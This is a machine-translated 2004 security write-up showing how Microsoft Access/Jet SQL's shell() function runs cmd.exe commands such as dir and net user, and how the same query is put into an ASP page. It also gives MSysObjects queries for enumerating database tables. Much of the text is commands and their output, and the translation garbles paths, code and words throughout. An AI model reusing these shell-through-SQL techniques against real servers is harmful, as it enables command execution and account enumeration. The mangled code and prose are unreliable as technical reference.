Author: SuperHei article in Nature: Original release date: 2004-09-16 Let sql queries directly in accessl in:
Select shell ('c: /winnt/system32/cmd.exe / c dir c: /> c: /123456.txt'); "Run" results:
C: /> DIR 123456.TXT The volume in the drive C does not have a label. The serial number of the volume is 3CEE-A8A9 C: /'s catalog 2004-01-09 22:29 1,718 123456.txt 1 file 1,718 byte 0 directory 1,224,527,872 Available bytes C: /> Type 123456.txt drive C Volume has no label. The serial number of the volume is 3CEE-A8A9 C: /'s catalog 2004-01-07 15:35 44 1.txt 2004-07-15 05:15 49 11.txt 2004-01-09 22:29 0 123456.txt 2004 -07-31 15:50 478 333.TXT successfully implemented, let's take a look, the statement is changed to:
Select Shell ('c: /winnt/system32/cmd.exe / c dir c: /> C: 3456.txt'); User Account for User Accounts for C: C: C: /> NET USER / KAK-E8UHOQ9M6S ----- ---------------------------------------- AA Administrator IUSR_KAK-E8UHOQ9M6S IWAM_KAK-E8UHOQ9M6S command Completed successfully. It seems that the permissions are relatively large (but maybe inherited the permission of the user who run Access, I use the administrator privilege to run, do not test the guest, the following we test the SP execution, first write an ASP, the code is as follows:
<% Set conn = server.createObject ("AdoDb.Connection") DSN = "provider = microsoft.jet.Oledb.4.0; data source =" & server.mappath ("q.mdb") set = server.createObject (" AdoDb.recordset ") Conn.open DSN SQL =" SELECT Shell ('C: /Winnt/System32/cmd.exe / C Dir C: /> D: /sss1.txt') "rs.open SQL, CONN IF RS .eof and ly b 'access allowed end if rs.close set = Nothing' Off Connect Conn.close Set Conn = Nothing response.write "SQL is:" & SQL%> Run this ASP, return results as follows:
Microsoft VBScript Compile Error Errors '800A03F6' missing 'end' /iishelp/common/500-100.asp, line 242 Microsoft Jet Database Engine Error '80040E14' The 'shell' function is undefined. / Test/LSE/connections/kao6.asp, line 7 prompt "The 'shell' function is not defined", the test failed, I put the DSN = "provider =" provil = microsoft.jet.oledb.4.0; data source = "& Server in the ASP code . Mappath ("q.mdb") is changed to DSN = "provider = microsoft.jet.Oledb.3.5; data source =" & server.mappath ("q.mdb") Run IE Return: Microsoft VBScript Compiler error error '800A03F6 'Miss' end' /iishelp/common/500-100.asp, line 242 adodb.connection error '800A0E7A' Provider cannot be found. It may not be properly installed. /Test/lse/connections/kao8.asp, line 5 Provider is not installed did not continue test 2. test on violence library used here MsysObjecs: we build a new query statement is as follows: SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects; MSysObjects.DateCreate get. Establishing time msysObjects.dateUpdate Update Time MsysObjects.Name Database Name MSYSObjects.Type Database Type We do the above statement, get the results directly: We put it in the ASP:
<% Set conn = server.createObject ("AdoDb.Connection") DSN = "provider = microsoft.jet.Oledb.4.0; data source =" & server.mappath ("q.mdb") set = server.createObject (" ADODB.Recordset ") Conn.Open dsn SQL =" SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, MSysObjects.Name, MSysObjects.Type FROM MSysObjects; "rs.open sql, conn if rs.eof and rs.bof then 'Access Denied Else 'Access Allowed End if = Nothing' Close Conn = Nothing response.write "SQL" & SQL%> IE Returns:
